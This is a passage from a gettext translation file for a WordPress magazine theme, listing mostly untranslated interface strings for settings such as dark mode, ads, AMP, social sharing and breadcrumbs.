"Create a New Crop Size" msgstr "" #: backend/panels/sidebar.php:39 msgid "Create new or delete exist sidebars." msgstr "" #: backend/single-metaboxes.php:516 msgid "Create your review criteria based on the type you choose." msgstr "" #: backend/single-metaboxes.php:523 msgid "Criteria" msgstr "" #: backend/panels/design.php:313 msgid "Crop Position" msgstr "" #: backend/panels/reaction.php:51 msgid "Cry" msgstr "" #: backend/single-metaboxes.php:598 msgid "Currency" msgstr "" #: backend/configs.php:410 msgid "custom (Custom)" msgstr "" #: backend/category-settings.php:351 msgid "Custom Below" msgstr "" #: backend/panels/single-post.php:647 msgid "Custom date format for the last updated info." msgstr "" #: backend/panels/design.php:230 backend/single-metaboxes.php:283 #: backend/single-metaboxes.php:289 msgid "Custom Entry Meta" msgstr "" #: backend/category-settings.php:336 backend/panels/blog-pages.php:358 #: backend/panels/blog-pages.php:845 backend/panels/blog-pages.php:1259 #: backend/panels/blog-pages.php:1667 backend/panels/blog-pages.php:2159 #: backend/panels/bookmark.php:258 backend/panels/bookmark.php:706 msgid "Custom Featured Ratio" msgstr "" #: backend/panels/header.php:602 msgid "Custom Forget Password URL" msgstr "" #: backend/panels/ads.php:102 backend/panels/ads.php:291 msgid "Custom Image" msgstr "" #: backend/panels/ads.php:193 backend/panels/ads.php:382 msgid "Custom Image - Ad Destination" msgstr "" #: backend/panels/ads.php:179 backend/panels/ads.php:368 msgid "Custom Image - Ad Image" msgstr "" #: backend/panels/ads.php:186 backend/panels/ads.php:375 msgid "Custom Image - Dark Mode Ad Image" msgstr "" #: backend/panels/ads.php:200 backend/panels/ads.php:389 msgid "Custom Image - Max Width" msgstr "" #: backend/panels/ads.php:173 backend/panels/ads.php:362 msgid "Custom Image Settings" msgstr "" #: backend/panels/login.php:25 msgid "Custom Login Screen" msgstr "" #: backend/panels/header.php:595 msgid "Custom Register URL" msgstr "" #: backend/panels/design.php:685 msgid "Custom Round Corner" msgstr "" #: backend/panels/header.php:231 msgid "Custom Search SVG" msgstr "" #: backend/category-settings.php:402 backend/configs.php:210 msgid "Custom Settings Below" msgstr "" #: backend/panels/ads.php:135 backend/panels/ads.php:324 msgid "Custom Size Below" msgstr "" #: backend/panels/socials.php:198 msgid "Custom Social 1 - Color" msgstr "" #: backend/panels/socials.php:189 msgid "Custom Social 1 - Icon" msgstr "" #: backend/panels/socials.php:183 msgid "Custom Social 1 - Name" msgstr "" #: backend/panels/socials.php:177 msgid "Custom social 1 - URL" msgstr "" #: backend/panels/socials.php:225 msgid "Custom Social 2 - Color" msgstr "" #: backend/panels/socials.php:216 msgid "Custom Social 2 - Icon" msgstr "" #: backend/panels/socials.php:210 msgid "Custom Social 2 - Name" msgstr "" #: backend/panels/socials.php:204 msgid "Custom social 2 - URL" msgstr "" #: backend/panels/socials.php:252 msgid "Custom Social 3 - Color" msgstr "" #: backend/panels/socials.php:243 msgid "Custom Social 3 - Icon" msgstr "" #: backend/panels/socials.php:237 msgid "Custom Social 3 - Name" msgstr "" #: backend/panels/socials.php:231 msgid "Custom social 3 - URL" msgstr "" #: backend/panels/socials.php:165 msgid "Custom Social Profiles" msgstr "" #: backend/panels/block-grid.php:679 backend/panels/block-grid.php:866 #: backend/panels/block-list.php:531 backend/panels/block-list.php:726 msgid "Dark - Box Color" msgstr "" #: backend/panels/woocommerce.php:196 msgid "Dark - Price Color" msgstr "" #: backend/panels/woocommerce.php:212 msgid "Dark - Review Start Color" msgstr "" #: backend/panels/color.php:57 msgid "Dark Accent Color" msgstr "" #: backend/panels/color.php:52 msgid "Dark Accent Colors" msgstr "" #: backend/panels/blog-pages.php:52 backend/panels/blog-pages.php:618 #: backend/panels/blog-pages.php:1936 backend/panels/header-style.php:73 #: backend/panels/header-style.php:619 backend/single-metaboxes.php:135 #: backend/single-metaboxes.php:912 msgid "Dark Bottom Border" msgstr "" #: backend/panels/blog-pages.php:2398 msgid "Dark Header Image" msgstr "" #: backend/panels/dark-mode.php:16 backend/panels/dark-mode.php:28 msgid "Dark Mode" msgstr "" #: backend/panels/heading.php:74 backend/panels/heading.php:159 msgid "Dark Mode - Accent Heading Color" msgstr "" #: backend/mega-menu.php:249 msgid "Dark Mode - Attachment/SVG URL" msgstr "" #: backend/mega-menu.php:230 backend/panels/header.php:698 #: backend/panels/privacy.php:56 msgid "Dark Mode - Background Color" msgstr "" #: backend/panels/ads.php:520 msgid "Dark Mode - Button Text Color" msgstr "" #: backend/mega-menu.php:226 msgid "Dark Mode - Color" msgstr "" #: backend/panels/footer.php:152 msgid "Dark Mode - Copyright Logo" msgstr "" #: backend/panels/color.php:65 msgid "Dark Mode - Dark Accent Color" msgstr "" #: backend/panels/bookmark.php:128 backend/panels/bookmark.php:471 msgid "Dark Mode - Description Image" msgstr "" #: backend/panels/footer.php:40 msgid "Dark Mode - Footer Background" msgstr "" #: backend/panels/header.php:580 msgid "Dark Mode - Form Logo" msgstr "" #: backend/panels/color.php:36 msgid "Dark Mode - Global Highlight Color" msgstr "" #: backend/panels/blog-pages.php:1982 msgid "Dark Mode - Header Background" msgstr "" #: backend/panels/single-post.php:226 msgid "Dark Mode - Hyperlink Color" msgstr "" #: backend/panels/logo.php:54 msgid "Dark Mode - Main Logo" msgstr "" #: backend/panels/logo.php:103 msgid "Dark Mode - Mobile Logo" msgstr "" #: backend/panels/heading.php:66 backend/panels/heading.php:151 msgid "Dark Mode - Primary Heading Color" msgstr "" #: backend/panels/logo.php:70 msgid "Dark Mode - Retina Main Logo" msgstr "" #: backend/panels/ads.php:229 msgid "Dark Mode - Section Background" msgstr "" #: backend/panels/ads.php:506 msgid "Dark Mode - Slide Up Background" msgstr "" #: backend/category-settings.php:44 backend/panels/design.php:60 #: backend/panels/header.php:706 backend/panels/privacy.php:64 msgid "Dark Mode - Text Color" msgstr "" #: backend/panels/single-post.php:253 msgid "Dark Mode - Underline Color" msgstr "" #: backend/panels/color.php:86 msgid "Dark Mode Background" msgstr "" #: backend/panels/color.php:81 backend/panels/header-style.php:185 #: backend/panels/header-style.php:474 backend/panels/header-style.php:740 #: backend/panels/header.php:456 msgid "Dark Mode Colors" msgstr "" #: backend/mega-menu.php:153 msgid "Dark Text" msgstr "" #: backend/panels/header-style.php:620 msgid "Dark Top & Bottom Border" msgstr "" #: backend/configs.php:403 backend/panels/design.php:269 msgid "date (Publish Date)" msgstr "" #: backend/panels/single-post.php:646 msgid "Date Format" msgstr "" #: backend/panels/reaction.php:47 msgid "Dead" msgstr "" #: backend/panels/amp.php:56 msgid "Debug Mode" msgstr "" #: backend/panels/amp.php:63 msgid "" "Debug mode will provide more information about the each AMP page such as CSS " "usages, plugin scripts etc..." msgstr "" #: backend/panels/amp.php:214 backend/panels/blog-pages.php:49 #: backend/panels/blog-pages.php:615 backend/panels/blog-pages.php:1933 #: backend/panels/design.php:676 backend/single-metaboxes.php:146 #: backend/single-metaboxes.php:157 backend/single-metaboxes.php:923 #: backend/single-metaboxes.php:934 msgid "Default" msgstr "" #: backend/panels/footer.php:65 backend/panels/header-style.php:91 #: backend/panels/header-style.php:379 backend/panels/header-style.php:646 #: backend/panels/header.php:288 msgid "Default (Dark Text)" msgstr "" #: backend/panels/design.php:352 msgid "Default Crop Size Settings" msgstr "" #: backend/panels/dark-mode.php:42 msgid "Default Dark Mode" msgstr "" #: backend/category-settings.php:469 backend/category-settings.php:499 msgid "Default from Category Settings" msgstr "" #: backend/panels/amp.php:187 backend/panels/amp.php:196 #: backend/panels/amp.php:205 backend/panels/amp.php:223 #: backend/panels/amp.php:232 msgid "Default from Single Settings" msgstr "" #: backend/panels/heading.php:97 msgid "Default layout is based on the \"Global Heading Layout\" setting." msgstr "" #: backend/panels/logo.php:30 msgid "Default Logos" msgstr "" #: backend/panels/single-post.php:1187 msgid "Default Review Image" msgstr "" #: backend/panels/single-post.php:1164 msgid "Default Review Type" msgstr "" #: backend/panels/typography.php:1111 msgid "Default Widgets" msgstr "" #: backend/panels/design.php:327 msgid "Define Custom Crop Sizes" msgstr "" #: backend/panels/ads.php:494 backend/panels/newsletter.php:111 msgid "Delay Time" msgstr "" #: backend/panels/adblock.php:33 backend/panels/blog-pages.php:2411 #: backend/panels/newsletter.php:41 #: woocommerce/single-product/tabs/description.php:24 msgid "Description" msgstr "" #: backend/panels/bookmark.php:120 backend/panels/bookmark.php:463 msgid "Description Image" msgstr "" #: backend/category-settings.php:441 backend/panels/blog-pages.php:468 #: backend/panels/blog-pages.php:955 backend/panels/blog-pages.php:1369 #: backend/panels/blog-pages.php:1777 backend/panels/blog-pages.php:2269 #: backend/panels/bookmark.php:367 backend/panels/bookmark.php:815 msgid "Desktop - Title Font Size" msgstr "" #: backend/panels/header.php:277 msgid "Destination Link" msgstr "" #: backend/panels/adblock.php:14 msgid "" "Detecting most of the AdBlock extensions and show a popup to disable the " "extension." msgstr "" #: templates/parts.php:627 msgid "Digg" msgstr "" #: backend/panels/socials.php:104 msgid "Digg URL" msgstr "" #: backend/panels/single-post.php:1139 backend/single-metaboxes.php:648 msgid "Directly Redirect" msgstr "" #: backend/single-metaboxes.php:649 msgid "" "Directly redirect to the sponsor website when clicking on the post listing " "title." msgstr "" #: backend/panels/single-post.php:1140 msgid "" "Directly redirect to the sponsored URL when visitors click on the post title " "in the blog listing." msgstr "" #: backend/category-settings.php:106 backend/category-settings.php:118 #: backend/category-settings.php:317 backend/category-settings.php:350 #: backend/category-settings.php:473 backend/category-settings.php:503 #: backend/configs.php:197 backend/configs.php:297 backend/configs.php:303 #: backend/configs.php:337 backend/configs.php:343 backend/configs.php:358 #: backend/configs.php:381 backend/configs.php:387 backend/configs.php:427 #: backend/configs.php:433 backend/configs.php:587 #: backend/panels/blog-pages.php:326 backend/panels/blog-pages.php:497 #: backend/panels/blog-pages.php:527 backend/panels/blog-pages.php:813 #: backend/panels/blog-pages.php:984 backend/panels/blog-pages.php:1014 #: backend/panels/blog-pages.php:1227 backend/panels/blog-pages.php:1398 #: backend/panels/blog-pages.php:1428 backend/panels/blog-pages.php:1635 #: backend/panels/blog-pages.php:1806 backend/panels/blog-pages.php:1836 #: backend/panels/blog-pages.php:2127 backend/panels/blog-pages.php:2298 #: backend/panels/blog-pages.php:2328 backend/panels/bookmark.php:229 #: backend/panels/bookmark.php:396 backend/panels/bookmark.php:415 #: backend/panels/bookmark.php:677 backend/panels/bookmark.php:844 #: backend/panels/bookmark.php:871 backend/panels/breadcrumb.php:55 #: backend/panels/breadcrumb.php:66 backend/panels/breadcrumb.php:77 #: backend/panels/breadcrumb.php:88 backend/panels/breadcrumb.php:99 #: backend/panels/footer.php:99 backend/panels/page.php:87 #: backend/panels/single-post.php:239 backend/panels/single-post.php:454 #: backend/panels/single-post.php:1181 backend/panels/single-post.php:1223 #: backend/single-metaboxes.php:147 backend/single-metaboxes.php:159 #: backend/single-metaboxes.php:362 backend/single-metaboxes.php:410 #: backend/single-metaboxes.php:488 backend/single-metaboxes.php:653 #: backend/single-metaboxes.php:686 backend/single-metaboxes.php:697 #: backend/single-metaboxes.php:716 backend/single-metaboxes.php:826 #: backend/single-metaboxes.php:845 backend/single-metaboxes.php:864 #: backend/single-metaboxes.php:875 backend/single-metaboxes.php:924 #: backend/single-metaboxes.php:936 msgid "Disable" msgstr "" #: backend/panels/login.php:119 backend/panels/login.php:146 msgid "Disable Admin Bar" msgstr "" #: backend/panels/login.php:120 backend/panels/login.php:147 msgid "Disable admin bar for all users except for Administrators" msgstr "" #: backend/panels/single-post.php:1232 msgid "Disable All Comments" msgstr "" #: backend/panels/ads.php:60 msgid "" "Disable auto Adsense on Woocommerce such as shop, product, cart, checkout...." msgstr "" #: backend/panels/amp.php:216 msgid "Disable comment form on AMP site." msgstr "" #: backend/panels/optimized.php:43 msgid "Disable Dashicons" msgstr "" #: backend/panels/optimized.php:81 msgid "Disable Default Fonts" msgstr "" #: backend/panels/optimized.php:51 msgid "Disable Gutenberg Style on Page Builder" msgstr "" #: backend/panels/login.php:126 backend/panels/login.php:153 msgid "Disable Language Bar" msgstr "" #: backend/panels/amp.php:188 backend/panels/amp.php:197 #: backend/panels/amp.php:206 backend/panels/amp.php:215 #: backend/panels/amp.php:224 backend/panels/amp.php:233 msgid "Disable on AMP" msgstr "" #: backend/panels/ads.php:59 msgid "Disable on Woocommerce Pages" msgstr "" #: backend/panels/blog-pages.php:83 msgid "Disable or select a category header style for the category pages." msgstr "" #: backend/category-settings.php:79 msgid "Disable or select a category header style for this category page." msgstr "" #: backend/category-settings.php:366 backend/panels/block-classic.php:59 #: backend/panels/block-grid.php:59 backend/panels/block-grid.php:224 #: backend/panels/block-grid.php:389 backend/panels/block-grid.php:562 #: backend/panels/block-grid.php:749 backend/panels/block-list.php:67 #: backend/panels/block-list.php:240 backend/panels/block-list.php:421 #: backend/panels/block-list.php:616 backend/panels/blog-pages.php:393 #: backend/panels/blog-pages.php:880 backend/panels/blog-pages.php:1294 #: backend/panels/blog-pages.php:1702 backend/panels/blog-pages.php:2194 #: backend/panels/bookmark.php:292 backend/panels/bookmark.php:740 msgid "Disable or select setting for entry review meta." msgstr "" #: backend/category-settings.php:382 backend/panels/block-classic.php:74 #: backend/panels/block-grid.php:74 backend/panels/block-grid.php:239 #: backend/panels/block-grid.php:404 backend/panels/block-grid.php:577 #: backend/panels/block-grid.php:764 backend/panels/block-list.php:82 #: backend/panels/block-list.php:255 backend/panels/block-list.php:436 #: backend/panels/block-list.php:631 backend/panels/blog-pages.php:409 #: backend/panels/blog-pages.php:896 backend/panels/blog-pages.php:1310 #: backend/panels/blog-pages.php:1718 backend/panels/blog-pages.php:2210 #: backend/panels/bookmark.php:308 backend/panels/bookmark.php:756 msgid "Disable or select setting for the post format." msgstr "" #: backend/panels/blog-pages.php:425 backend/panels/blog-pages.php:912 #: backend/panels/blog-pages.php:1326 backend/panels/blog-pages.php:1734 #: backend/panels/blog-pages.php:2226 backend/panels/bookmark.php:324 #: backend/panels/bookmark.php:772 msgid "Disable or select settings for the post excerpt." msgstr "" #: backend/panels/optimized.php:59 msgid "Disable Polyfill Script" msgstr "" #: backend/panels/design.php:673 msgid "Disable round corner style for whole the website." msgstr "" #: backend/panels/optimized.php:35 msgid "Disable Srcset" msgstr "" #: backend/panels/optimized.php:36 msgid "Disable Srcset to optimize page speed score on mobile device." msgstr "" #: backend/panels/amp.php:189 backend/panels/amp.php:198 msgid "Disable the Author Card in the AMP mode." msgstr "" #: backend/panels/optimized.php:52 msgid "Disable the block style css on the page built with Page Builder." msgstr "" #: backend/panels/login.php:127 backend/panels/login.php:154 msgid "Disable the language bar in the login screen." msgstr "" #: backend/panels/amp.php:207 msgid "Disable the Next/Prev Articles section in the AMP mode." msgstr "" #: backend/panels/amp.php:225 msgid "Disable the related section in the AMP mode." msgstr "" #: backend/panels/amp.php:234 msgid "Disable the single post sidebar section in the AMP mode." msgstr "" #: backend/single-metaboxes.php:143 msgid "Disable the top ad site for this page." msgstr "" #: backend/panels/optimized.php:60 msgid "" "Disable wp-polyfill script (supporting older browsers that do not understand " "ES6) to improve the page speed score." msgstr "" #: backend/panels/single-post.php:1371 msgid "Disabled" msgstr "" #: backend/single-metaboxes.php:568 msgid "disadvantage item" msgstr "" #: backend/single-metaboxes.php:560 msgid "Disadvantages" msgstr "" #: backend/class-tgm-plugin-activation.php:407 msgid "Dismiss this notice" msgstr "" #: backend/mega-menu.php:235 msgid "" "Display a icon before this menu item label. You can choose font icon or " "custom attachment image/SVG." msgstr "" #: backend/mega-menu.php:211 msgid "Display a sub label after this navigation label." msgstr "" #: backend/panels/design.php:185 msgid "Display Human Time (Ago)" msgstr "" #: backend/panels/newsletter.php:93 msgid "Display Mode" msgstr "" #: backend/single-metaboxes.php:745 msgid "" "Display page selected section when you use break pages for a lengthy content " "post." msgstr "" #: backend/panels/woocommerce.php:182 msgid "Display Percentage saved on WooCommerce sale products" msgstr "" #: backend/panels/single-post.php:1275 backend/panels/table-contents.php:141 #: backend/single-metaboxes.php:736 msgid "Display Position" msgstr "" #: backend/panels/ads.php:428 backend/panels/amp.php:588 msgid "Display Positions" msgstr "" #: backend/mega-menu.php:121 msgid "Display posts of this category." msgstr "" #: backend/panels/design.php:206 msgid "Display the edit post link for the logged users on the featured image." msgstr "" #: backend/panels/single-post.php:1738 msgid "Display the reading indicator bar at the top site." msgstr "" #: includes/sidebars.php:80 msgid "Display widget ad at the bottom of the website header." msgstr "" #: backend/panels/newsletter.php:104 msgid "Distance of Scroll" msgstr "" #: backend/panels/ads.php:134 backend/panels/ads.php:323 msgid "Do not Override" msgstr "" #: backend/panels/ads.php:45 msgid "Do not place more than one auto ads code in the website." msgstr "" #: templates/parts.php:630 msgid "Dribbble" msgstr "" #: backend/panels/socials.php:110 msgid "Dribbble URL" msgstr "" #: templates/parts.php:175 #, php-format msgid "Dynamic %s pagination" msgstr "" #: backend/panels/amp.php:181 msgid "" "Each AMP page has a 75,000 byte CSS limit, turn off unnecessary section will " "increase the AMP performance." msgstr "" #: backend/panels/amp.php:50 msgid "" "Each AMP page has a 75,000 byte CSS limit. Foxiz will support a compact " "footer to ensure your website will meet with this requirement." msgstr "" #: backend/panels/header.php:128 msgid "" "Each widget is added in \"Appearance >Widgets > More Menu Section\" will be " "corresponding to a column." msgstr "" #: templates/single/templates.php:970 msgid "Edit" msgstr "Editar" #: templates/entry.php:828 msgid "edit" msgstr "editar" #: backend/panels/design.php:205 msgid "Edit Link" msgstr "" #: templates/parts.php:120 msgid "Edit Page" msgstr "" #: backend/panels/design.php:200 backend/panels/design.php:337 msgid "Edit Post Link" msgstr "" #: backend/install-plugins.php:30 msgid "Elementor Website Builder" msgstr "" #: backend/panels/woocommerce.php:172 msgid "Elements Styling" msgstr "" #: backend/panels/optimized.php:195 backend/panels/single-post.php:804 #: backend/panels/single-post.php:943 backend/panels/single-post.php:1081 #: backend/panels/single-post.php:1705 msgid "Email" msgstr "" #: backend/panels/reaction.php:52 msgid "Embarrass" msgstr "" #: backend/category-settings.php:117 backend/category-settings.php:316 #: backend/configs.php:196 backend/configs.php:425 backend/mega-menu.php:131 #: backend/panels/blog-pages.php:325 backend/panels/blog-pages.php:812 #: backend/panels/blog-pages.php:1226 backend/panels/blog-pages.php:1634 #: backend/panels/blog-pages.php:2126 backend/panels/bookmark.php:228 #: backend/panels/bookmark.php:676 backend/panels/login.php:30 #: backend/panels/page.php:86 backend/panels/single-post.php:238 #: backend/panels/single-post.php:453 backend/panels/single-post.php:1179 #: backend/single-metaboxes.php:158 backend/single-metaboxes.php:361 #: backend/single-metaboxes.php:409 backend/single-metaboxes.php:477 #: backend/single-metaboxes.php:616 backend/single-metaboxes.php:654 #: backend/single-metaboxes.php:685 backend/single-metaboxes.php:696 #: backend/single-metaboxes.php:715 backend/single-metaboxes.php:825 #: backend/single-metaboxes.php:844 backend/single-metaboxes.php:863 #: backend/single-metaboxes.php:876 backend/single-metaboxes.php:935 msgid "Enable" msgstr "" #: backend/panels/single-post.php:1225 msgid "Enable for All Posts" msgstr "" #: backend/panels/single-post.php:1224 msgid "Enable for Review Posts" msgstr "" #: backend/panels/header.php:216 msgid "Enable live search result when typing." msgstr "" #: backend/single-metaboxes.php:821 msgid "" "Enable or disable ajax load next posts for this post. This setting will " "override on the global setting." msgstr "" #: backend/panels/single-post.php:1434 msgid "" "Enable or disable ajax load next posts when visitors reached end of the post " "content." msgstr "" #: backend/single-metaboxes.php:405 msgid "Enable or disable autoplay audio for this post." msgstr "" #: backend/panels/design.php:427 msgid "Enable or disable autoplay for the sliders." msgstr "" #: backend/single-metaboxes.php:357 msgid "Enable or disable autoplay video for this post." msgstr "" #: backend/panels/single-post.php:715 backend/panels/single-post.php:854 #: backend/panels/single-post.php:992 backend/panels/single-post.php:1613 msgid "Enable or disable color for social icons." msgstr "" #: backend/panels/single-post.php:480 msgid "Enable or disable entry category info in the single post." msgstr "" #: backend/panels/design.php:454 msgid "Enable or disable free mode when scrolling on the carousels." msgstr "" #: backend/panels/design.php:648 msgid "Enable or disable GIF supported for your website." msgstr "" #: backend/panels/table-contents.php:149 msgid "Enable or disable hierarchy for the table of contents box." msgstr "" #: backend/panels/design.php:492 msgid "Enable or disable icon for the audio post format." msgstr "" #: backend/panels/design.php:485 msgid "Enable or disable icon for the gallery post format." msgstr "" #: backend/panels/design.php:478 msgid "Enable or disable icon for the video post format." msgstr "" #: backend/panels/optimized.php:237 msgid "" "Enable or disable Open Graph (share to social). This option will be " "automatically disabled if you use Yoast SEO." msgstr "" #: backend/panels/optimized.php:75 msgid "Enable or disable preload font icons to increase the site speed score." msgstr "" #: backend/panels/optimized.php:68 msgid "" "Enable or disable preload Google fonts to increase the site speed score." msgstr "" #: backend/panels/single-post.php:276 msgid "" "Enable or disable quick view info bar (review & sponsor meta) at the top of " "the content." msgstr "" #: backend/single-metaboxes.php:871 msgid "" "Enable or disable review markup for this review. This option is useful in " "case you are using 3rd party markup plugin." msgstr "" #: backend/panels/optimized.php:161 msgid "" "Enable or disable review product markup for single post page if you want to " "use 3rd party plugin." msgstr "" #: backend/panels/optimized.php:122 msgid "" "Enable or disable schema markup for the website, helps generate brand " "signals. Disable this option if you want to use 3rd party plugin." msgstr "" #: backend/single-metaboxes.php:859 msgid "" "Enable or disable Schema markup for this article. Disable default schema " "markup for this post if you use a 3rd plugin to create another post type for " "example Recipe, Videos." msgstr "" #: backend/panels/header.php:238 msgid "Enable or disable search icon in the mobile header." msgstr "" #: backend/panels/header.php:245 msgid "Enable or disable search icon the AMP header." msgstr "" #: backend/panels/single-post.php:805 backend/panels/single-post.php:944 #: backend/panels/single-post.php:1082 backend/panels/single-post.php:1706 msgid "Enable or disable share on Email." msgstr "" #: backend/panels/single-post.php:724 backend/panels/single-post.php:863 #: backend/panels/single-post.php:1001 backend/panels/single-post.php:1508 #: backend/panels/single-post.php:1634 msgid "Enable or disable share on Facebook." msgstr "" #: backend/panels/single-post.php:760 backend/panels/single-post.php:899 #: backend/panels/single-post.php:1037 backend/panels/single-post.php:1666 msgid "Enable or disable share on LinkedIn." msgstr "" #: backend/panels/single-post.php:742 backend/panels/single-post.php:881 #: backend/panels/single-post.php:1019 backend/panels/single-post.php:1650 msgid "Enable or disable share on Pinterest." msgstr "" #: backend/panels/single-post.php:778 backend/panels/single-post.php:917 #: backend/panels/single-post.php:1055 backend/panels/single-post.php:1524 #: backend/panels/single-post.php:1682 msgid "Enable or disable share on Reddit." msgstr "" #: backend/panels/single-post.php:984 msgid "Enable or disable share on socials at the fixed left section." msgstr "" #: backend/panels/single-post.php:1605 msgid "Enable or disable share on socials list in this bar." msgstr "" #: backend/panels/single-post.php:796 backend/panels/single-post.php:935 #: backend/panels/single-post.php:1073 backend/panels/single-post.php:1698 msgid "Enable or disable share on Telegram." msgstr "" #: backend/panels/single-post.php:769 backend/panels/single-post.php:908 #: backend/panels/single-post.php:1046 backend/panels/single-post.php:1674 msgid "Enable or disable share on Tumblr." msgstr "" #: backend/panels/single-post.php:733 backend/panels/single-post.php:872 #: backend/panels/single-post.php:1010 backend/panels/single-post.php:1516 #: backend/panels/single-post.php:1642 msgid "Enable or disable share on Twitter." msgstr "" #: backend/panels/single-post.php:787 backend/panels/single-post.php:926 #: backend/panels/single-post.php:1064 backend/panels/single-post.php:1690 msgid "Enable or disable share on Vkontakte." msgstr "" #: backend/panels/single-post.php:751 backend/panels/single-post.php:890 #: backend/panels/single-post.php:1028 backend/panels/single-post.php:1658 msgid "Enable or disable share on WhatsApp." msgstr "" #: backend/panels/table-contents.php:164 msgid "Enable or disable smooth scroll effect to jumb to the anchor link." msgstr "" #: backend/single-metaboxes.php:612 msgid "Enable or disable sponsored content for this post." msgstr "" #: backend/panels/page.php:83 msgid "Enable or disable sticky sidebar feature for the single page." msgstr "" #: backend/panels/single-post.php:450 msgid "" "Enable or disable sticky sidebar feature. This option will only apply to the " "single post." msgstr "" #: backend/panels/blog-pages.php:1631 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "archive pages." msgstr "" #: backend/panels/blog-pages.php:1223 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the author " "pages." msgstr "" #: backend/panels/blog-pages.php:809 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the blog " "page." msgstr "" #: backend/panels/blog-pages.php:322 backend/panels/bookmark.php:225 #: backend/panels/bookmark.php:673 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "category pages." msgstr "" #: backend/panels/blog-pages.php:2123 backend/panels/blog-pages.php:2343 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the search " "pages." msgstr "" #: backend/panels/single-post.php:1597 msgid "Enable or disable sticky the single post headline (post title)" msgstr "" #: backend/panels/block-classic.php:114 backend/panels/block-grid.php:114 #: backend/panels/block-grid.php:279 backend/panels/block-grid.php:444 #: backend/panels/block-grid.php:617 backend/panels/block-grid.php:804 #: backend/panels/block-list.php:122 backend/panels/block-list.php:295 #: backend/panels/block-list.php:476 backend/panels/block-list.php:671 msgid "Enable or disable the \"sponsored by\" meta." msgstr "" #: backend/panels/adblock.php:20 msgid "Enable or disable the adblock detector." msgstr "" #: backend/single-metaboxes.php:154 backend/single-metaboxes.php:931 msgid "Enable or disable the alert bar below the header." msgstr "" #: backend/panels/header.php:652 msgid "" "Enable or disable the alert bar below the header. This option will be " "overridden by the setting in individual post/page." msgstr "" #: backend/panels/single-post.php:577 msgid "Enable or disable the author avatars before the entry meta bar." msgstr "" #: backend/panels/blog-pages.php:1078 msgid "Enable or disable the author bio in the author pages." msgstr "" #: backend/panels/single-post.php:384 msgid "Enable or disable the author information in the bottom of the content." msgstr "" #: backend/panels/single-post.php:601 msgid "Enable or disable the author job info." msgstr "" #: backend/panels/amp.php:152 backend/panels/general.php:26 msgid "Enable or disable the back to top button." msgstr "" #: backend/panels/bookmark.php:38 msgid "" "Enable or disable the bookmark feature. This is global option and will apply " "to whole the website." msgstr "" #: backend/category-settings.php:390 backend/panels/block-classic.php:82 #: backend/panels/block-grid.php:82 backend/panels/block-grid.php:247 #: backend/panels/block-grid.php:412 backend/panels/block-grid.php:585 #: backend/panels/block-grid.php:772 backend/panels/block-list.php:90 #: backend/panels/block-list.php:263 backend/panels/block-list.php:444 #: backend/panels/block-list.php:639 backend/panels/blog-pages.php:417 #: backend/panels/blog-pages.php:904 backend/panels/blog-pages.php:1318 #: backend/panels/blog-pages.php:1726 backend/panels/blog-pages.php:2218 #: backend/panels/bookmark.php:316 backend/panels/bookmark.php:764 msgid "Enable or disable the bookmark icon." msgstr "" #: backend/single-metaboxes.php:693 msgid "Enable or disable the bottom entry widgets for this post." msgstr "" #: backend/panels/single-post.php:846 msgid "" "Enable or disable the bottom share bar, This section is displayed at below " "of the post content." msgstr "" #: backend/panels/breadcrumb.php:31 msgid "Enable or disable the breadcrumb bar for your website." msgstr "" #: backend/panels/breadcrumb.php:62 msgid "Enable or disable the breadcrumb bar in the single page." msgstr "" #: backend/panels/breadcrumb.php:51 msgid "Enable or disable the breadcrumb bar in the single post." msgstr "" #: backend/panels/breadcrumb.php:95 msgid "Enable or disable the breadcrumb in the archive pages." msgstr "" #: backend/panels/breadcrumb.php:84 msgid "Enable or disable the breadcrumb in the author pages." msgstr "" #: backend/panels/breadcrumb.php:73 msgid "Enable or disable the breadcrumb in the category pages." msgstr "" #: backend/category-settings.php:101 msgid "Enable or disable the breadcrumb in this category header." msgstr "" #: backend/panels/single-post.php:1213 msgid "" "Enable or disable the button show/hide comment box in the single post pages." msgstr "" #: backend/panels/single-post.php:1474 msgid "" "Enable or disable the button show/hide comment box when load next posts." msgstr "" #: backend/panels/single-post.php:953 msgid "Enable or disable the copy post link button." msgstr "" #: backend/panels/single-post.php:814 backend/panels/single-post.php:1091 msgid "Enable or disable the copy post link icon." msgstr "" #: backend/panels/dark-mode.php:29 msgid "Enable or disable the dark mode whole your website." msgstr "" #: backend/panels/optimized.php:153 msgid "" "Enable or disable the default schema markup for single post page if you want " "to use 3rd party plugin." msgstr "" #: backend/panels/amp.php:131 msgid "Enable or disable the footer copyright section." msgstr "" #: backend/panels/ads.php:463 msgid "Enable or disable the footer slide up section." msgstr "" #: backend/panels/single-post.php:1500 msgid "Enable or disable the highlight shares feature." msgstr "" #: backend/panels/design.php:186 msgid "" "Enable or disable the human time format (\"ago\") for the data post entry " "meta." msgstr "" #: backend/panels/single-post.php:639 msgid "Enable or disable the last updated meta info in the single post." msgstr "" #: backend/panels/optimized.php:28 msgid "Enable or disable the lazy load for the featured image." msgstr "" #: backend/category-settings.php:374 backend/panels/block-classic.php:67 #: backend/panels/block-grid.php:67 backend/panels/block-grid.php:232 #: backend/panels/block-grid.php:397 backend/panels/block-grid.php:570 #: backend/panels/block-grid.php:757 backend/panels/block-list.php:75 #: backend/panels/block-list.php:248 backend/panels/block-list.php:429 #: backend/panels/block-list.php:624 backend/panels/blog-pages.php:401 #: backend/panels/blog-pages.php:888 backend/panels/blog-pages.php:1302 #: backend/panels/blog-pages.php:1710 backend/panels/blog-pages.php:2202 #: backend/panels/bookmark.php:300 backend/panels/bookmark.php:748 msgid "Enable or disable the meta description at the end of the review bar." msgstr "" #: backend/panels/header-style.php:30 backend/panels/header-style.php:324 #: backend/panels/header-style.php:575 msgid "Enable or disable the more button at the end of the navigation." msgstr "" #: backend/panels/single-post.php:334 msgid "Enable or disable the newsletter form at bottom entry content." msgstr "" #: backend/panels/single-post.php:393 msgid "" "Enable or disable the next/previous link navigation in single post pages." msgstr "" #: backend/panels/header.php:270 msgid "Enable or disable the notification section on the header." msgstr "" #: backend/panels/table-contents.php:157 msgid "Enable or disable the number list items." msgstr "" #: backend/panels/single-post.php:1395 msgid "Enable or disable the popular section in single post pages." msgstr "" #: backend/panels/newsletter.php:28 msgid "Enable or disable the popup newsletter form." msgstr "" #: backend/panels/bookmark.php:45 